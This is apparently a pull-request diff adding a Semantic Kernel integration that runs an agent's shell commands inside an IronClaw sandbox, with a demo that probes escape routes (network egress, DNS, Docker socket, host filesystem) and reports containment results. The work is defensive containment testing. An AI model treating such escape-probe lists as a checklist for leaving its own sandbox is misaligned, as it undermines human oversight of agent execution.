+out, a code-interpreter plugin, ...): the kernel calls it exactly the same way,
+but every command runs inside an isolated IronClaw per-session sandbox instead of
+on your machine.
+
+    from ironclaw_tool import make_sandbox_tool
+    from ironclaw_sandbox import IronClawSandbox
+
+    sandbox = IronClawSandbox().__enter__()
+    plugin = make_sandbox_tool(sandbox)        # a real SK native plugin
+    kernel.add_plugin(plugin, plugin_name="ironclaw")
+"""
+
+from __future__ import annotations
+
+from semantic_kernel.functions import kernel_function
+
+from ironclaw_sandbox import IronClawSandbox
+
+_DESCRIPTION = (
+    "Execute a shell command inside an isolated IronClaw sandbox and return its "
+    "stdout/stderr and exit code. Use this for any code the user asks you to run. "
+    "The sandbox has no network, no access to the host filesystem, and no Docker "
+    "socket, so it is safe to run untrusted commands."
+)
+
+
+def make_sandbox_tool(sandbox: IronClawSandbox) -> object:
+    """Wrap a live IronClaw sandbox as a Semantic Kernel native plugin.
+
+    The sandbox handle is captured in a closure so it does not have to be a
+    pydantic/kernel field on the plugin, which keeps this robust across
+    semantic-kernel versions.
+    """
+
+    class IronClawSandboxPlugin:
+        @kernel_function(name="sandboxed_shell", description=_DESCRIPTION)
+        def sandboxed_shell(self, command: str) -> str:
+            """Run a shell command inside the IronClaw sandbox and return its output."""
+            return str(sandbox.run(command))
+
+    return IronClawSandboxPlugin()

--- a/examples/integrations/semantic-kernel/requirements.txt
+++ b/examples/integrations/semantic-kernel/requirements.txt
@@ -1,0 +1,8 @@
+# The IronClaw sandbox client is pure standard library; the only dependency this
+# example adds is Semantic Kernel itself. Floor-pinned to the 1.x line where the
+# `@kernel_function` decorator and the function-choice behavior API are stable.
+semantic-kernel>=1.0,<2.0
+
+# The default credential-free path only needs the `@kernel_function` decorator
+# above. The real-LLM path (set OPENAI_API_KEY) uses semantic-kernel's bundled
+# OpenAI connector -- no extra install.

--- a/examples/integrations/semantic-kernel/run.py
+++ b/examples/integrations/semantic-kernel/run.py
@@ -1,0 +1,79 @@
+#!/usr/bin/env python3
+"""Run a Semantic Kernel agent whose code execution is backed by an IronClaw sandbox.
+
+Zero credentials by default: it engages a real IronClaw per-session sandbox
+against the offline demo control-plane (mock provider) and drives the Semantic
+Kernel `sandboxed_shell` kernel function exactly as the kernel would when a model
+picks it -- one benign task plus a battery of escape attempts -- then prints a
+PASS/FAIL containment table.
+
+Set OPENAI_API_KEY to instead let a real LLM-driven kernel decide what to run; the
+plugin (and therefore the isolation) is identical either way.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import os
+import sys
+
+# Make the shared client + demo importable (examples/integrations/_shared).
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "_shared"))
+
+from containment_demo import PROBES, run_containment_demo  # noqa: E402
+from ironclaw_sandbox import IronClawSandbox  # noqa: E402
+from ironclaw_tool import make_sandbox_tool  # noqa: E402
+
+
+def drive_with_real_agent(plugin) -> int:
+    """Optional: let a real LLM-driven kernel decide what to run (needs a key)."""
+    from semantic_kernel import Kernel
+    from semantic_kernel.connectors.ai.function_choice_behavior import (
+        FunctionChoiceBehavior,
+    )
+    from semantic_kernel.connectors.ai.open_ai import (
+        OpenAIChatCompletion,
+        OpenAIChatPromptExecutionSettings,
+    )
+
+    async def _run() -> None:
+        kernel = Kernel()
+        kernel.add_service(OpenAIChatCompletion(ai_model_id="gpt-4o-mini"))
+        kernel.add_plugin(plugin, plugin_name="ironclaw")
+        settings = OpenAIChatPromptExecutionSettings(
+            function_choice_behavior=FunctionChoiceBehavior.Auto()
+        )
+        answer = await kernel.invoke_prompt(
+            "Run `id` with the sandboxed_shell function and tell me which user "
+            "the sandbox runs as.",
+            arguments=None,
+            settings=settings,
+        )
+        print(answer)
+
+    asyncio.run(_run())
+    return 0
+
+
+def main() -> int:
+    print("==> engaging an IronClaw per-session sandbox (mock provider, zero-cred)")
+    with IronClawSandbox() as sandbox:
+        print(f"    sandbox container: {sandbox.container}")
+        plugin = make_sandbox_tool(sandbox)
+
+        if os.environ.get("OPENAI_API_KEY"):
+            print("==> OPENAI_API_KEY set: driving a real Semantic Kernel")
+            return drive_with_real_agent(plugin)
+
+        # Deterministic, zero-cred path: call the kernel function exactly as SK's
+        # function-calling loop does -- plugin.sandboxed_shell(command=...) -- per
+        # probe.
+        print(f"==> driving the 'sandboxed_shell' function over {len(PROBES)} agent commands")
+        return run_containment_demo(
+            lambda command: plugin.sandboxed_shell(command=command),
+            framework="Semantic Kernel",
+        )
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/examples/integrations/semantic-kernel/run.sh
+++ b/examples/integrations/semantic-kernel/run.sh
@@ -1,0 +1,39 @@
+#!/usr/bin/env bash
+# Semantic Kernel + IronClaw sandbox -- one-command demo.
+#
+# Brings up the offline demo control-plane (mock provider -- no model key, no
+# channel tokens), then runs a Semantic Kernel agent whose `sandboxed_shell`
+# kernel function executes inside a real IronClaw per-session sandbox. It runs one
+# benign task and a battery of escape attempts and prints a PASS/FAIL containment
+# table.
+#
+#   examples/integrations/semantic-kernel/run.sh           # build + up + demo + tear down
+#   examples/integrations/semantic-kernel/run.sh --keep     # leave the demo running
+#   examples/integrations/semantic-kernel/run.sh --attach   # use an already-running demo
+#
+# Env overrides (all optional):
+#   IRONCLAW_ADDR        control-plane base URL  (default http://127.0.0.1:8787)
+#   IRONCLAW_API_TOKEN   API bearer token        (default ironclaw-demo)
+#   IRONCLAW_DEMO_AGENT  agent group id          (default mock-agent)
+#   SKIP_BUILD=1         skip the sandbox image build (assume it exists)
+#   OPENAI_API_KEY       if set, drive a real LLM kernel instead of the scripted one
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)"
+source "$SCRIPT_DIR/../_shared/demo-lifecycle.sh"
+
+# Semantic Kernel supports Python 3.10-3.12. Pick a compatible interpreter unless
+# the caller pinned one via PYTHON.
+if [ -z "${PYTHON:-}" ]; then
+  for cand in python3.12 python3.11 python3.10 python3; do
+    if command -v "$cand" >/dev/null 2>&1; then PYTHON="$cand"; break; fi
+  done
+  export PYTHON
+fi
+
+ensure_demo_up "$@"
+setup_venv "$SCRIPT_DIR"
+
+echo "==> running the Semantic Kernel sandbox demo"
+python "$SCRIPT_DIR/run.py"


### PR DESCRIPTION
## What

Extends `examples/integrations/` with **AutoGen** (Microsoft) and **Semantic Kernel**, mirroring the existing langchain/crewai framework-tool shape. Each new framework = another awesome-list distribution surface + IRO-348 SEO page + a community to reach.

## Contents

- `examples/integrations/autogen/` — a real `autogen_core` `FunctionTool` (`sandboxed_shell`) whose commands run inside a live IronClaw per-session sandbox; `run.py` drives it via the same `run_json` path an `AssistantAgent`'s tool loop uses.
- `examples/integrations/semantic-kernel/` — a native SK `@kernel_function` plugin (`sandboxed_shell`) backed by the sandbox; `run.py` drives it via the same call SK's function-calling loop makes.
- Both reuse `_shared/ironclaw_sandbox.py` + `containment_demo.py`, so `smoke-matrix.sh` auto-discovers each (`run.sh --attach`) with **no wiring change**.
- Each ships `run.sh` + `README` + `requirements.txt` + a zero-credential Docker e2e.
- SEO cluster pages `docs/integrations/autogen.md` + `semantic-kernel.md` (nav + index updated); examples README rows.

## Verification

Ran both examples e2e against the live demo control-plane (colima):

```
=== AutoGen agent -> IronClaw sandbox: containment demo ===
  [OK ] benign task: run agent code            -> [exit 0] ... uid=65532(nonroot) ...
  [OK ] network egress: only loopback exists   -> [exit 0] lo
  [OK ] network egress: DNS lookup ... fails   -> [exit 0] NO_EGRESS
  [OK ] host escape: Docker Engine socket ...  -> [exit 0] ABSENT
  [OK ] host escape: host filesystem ...       -> [exit 0] CONTAINED
RESULT: PASS -- benign code ran; every escape attempt was contained.
```

- Both print the PASS/FAIL containment table and **exit 0**; benign code runs as **uid 65532(nonroot)**; every escape probe (network egress, DNS, Docker socket, host FS) is **BLOCKED**.
- Adapters validated against **autogen-core 0.7.5** and **semantic-kernel 1.43.1** (real `run_json` / `@kernel_function` invocation, not mocks).
- `bash -n` + `py_compile` clean; smoke-matrix `--attach` dispatch confirmed matching both new dirs.

## Lenses

Build-matrix fidelity / reproducibility not affected (examples only; no release-path change). Zero-credential (mock provider), pure-stdlib sandbox client — no new secrets. Follow-up (separate, no-account): awesome-autogen / awesome-semantic-kernel PRs once merged.